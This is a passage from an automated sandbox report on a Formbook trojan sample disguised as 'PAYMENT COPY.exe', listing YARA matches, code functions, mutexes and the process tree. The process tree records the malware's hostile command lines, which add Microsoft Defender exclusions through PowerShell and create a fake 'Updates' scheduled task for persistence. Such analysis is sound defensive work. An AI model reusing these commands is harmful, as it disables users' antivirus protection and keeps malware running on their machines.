Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048F0F30	13_2_048F0F30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04944F40	13_2_04944F40
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048B68B8	13_2_048B68B8
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048FE8F0	13_2_048FE8F0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D2840	13_2_048D2840
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DA840	13_2_048DA840
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D29A0	13_2_048D29A0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0499A9A6	13_2_0499A9A6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048E6962	13_2_048E6962
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048CEA80	13_2_048CEA80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04986BD7	13_2_04986BD7
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498AB40	13_2_0498AB40
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498F43F	13_2_0498F43F
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C1460	13_2_048C1460
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496D5B0	13_2_0496D5B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049995C3	13_2_049995C3
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04987571	13_2_04987571
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049816CC	13_2_049816CC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04915630	13_2_04915630
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498F7B0	13_2_0498F7B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D70C0	13_2_048D70C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0497F0CC	13_2_0497F0CC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049870E9	13_2_049870E9
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498F0E0	13_2_0498F0E0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DB1B0	13_2_048DB1B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0499B16B	13_2_0499B16B
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048BF172	13_2_048BF172
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0490516C	13_2_0490516C
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D52A0	13_2_048D52A0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EB2C0	13_2_048EB2C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049712ED	13_2_049712ED
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0491739A	13_2_0491739A
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498132D	13_2_0498132D
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048BD34C	13_2_048BD34C
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FCF2	13_2_0498FCF2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04949C32	13_2_04949C32
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EFDC0	13_2_048EFDC0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04981D5A	13_2_04981D5A
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D3D40	13_2_048D3D40
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04987D73	13_2_04987D73
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D9EB0	13_2_048D9EB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D1F92	13_2_048D1F92
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FFB1	13_2_0498FFB1
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04893FD2	13_2_04893FD2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04893FD5	13_2_04893FD5
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FF09	13_2_0498FF09
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D38E0	13_2_048D38E0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0493D800	13_2_0493D800
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04965910	13_2_04965910
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D9950	13_2_048D9950
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EB950	13_2_048EB950
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04915AA0	13_2_04915AA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04971AA3	13_2_04971AA3
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496DAAC	13_2_0496DAAC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0497DAC6	13_2_0497DAC6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FA49	13_2_0498FA49
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04987A46	13_2_04987A46
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04943A6C	13_2_04943A6C
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EFB80	13_2_048EFB80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04945BF0	13_2_04945BF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0490DBF9	13_2_0490DBF9
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FB76	13_2_0498FB76
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00871BD0	13_2_00871BD0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0088A4F0	13_2_0088A4F0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086CDD7	13_2_0086CDD7
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086CDE0	13_2_0086CDE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086B080	13_2_0086B080
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086D000	13_2_0086D000
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_008736F0	13_2_008736F0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 01505130 appears 58 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 0153EA12 appears 86 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 01517E54 appears 111 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 0154F290 appears 105 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 014BB970 appears 280 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 048BB970 appears 280 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 04917E54 appears 111 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 0494F290 appears 105 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 04905130 appears 58 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 0493EA12 appears 86 times

Sample file is different than original file name gathered from version info

Source: PAYMENT COPY.exe, 00000000.00000002.2541512571.00000000070D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000000.2482179124.00000000007DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameiAuF.exeJ vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2537047535.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2541956443.0000000007375000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2524034674.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2540867371.0000000005D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegprslt.exej% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000009.00000002.2685474878.00000000015BD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe	Binary or memory string: OriginalFilenameiAuF.exeJ vs PAYMENT COPY.exe

Uses 32bit PE files

Source: PAYMENT COPY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: PAYMENT COPY.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bQrgcvrrXfGN.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 10.2.bQrgcvrrXfGN.exe.2eff3dc.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.2de4980.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.2aaf3ac.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 10.2.bQrgcvrrXfGN.exe.3234a40.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.5d30000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.2abf3c4.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/14@16/13

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Mutant created: \Sessions\1\BaseNamedObjects\GBGYKeQRubQCYdhkCufx
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"
Source: C:\Windows\SysWOW64\gpresult.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: ntmarta.dll	Jump to behavior
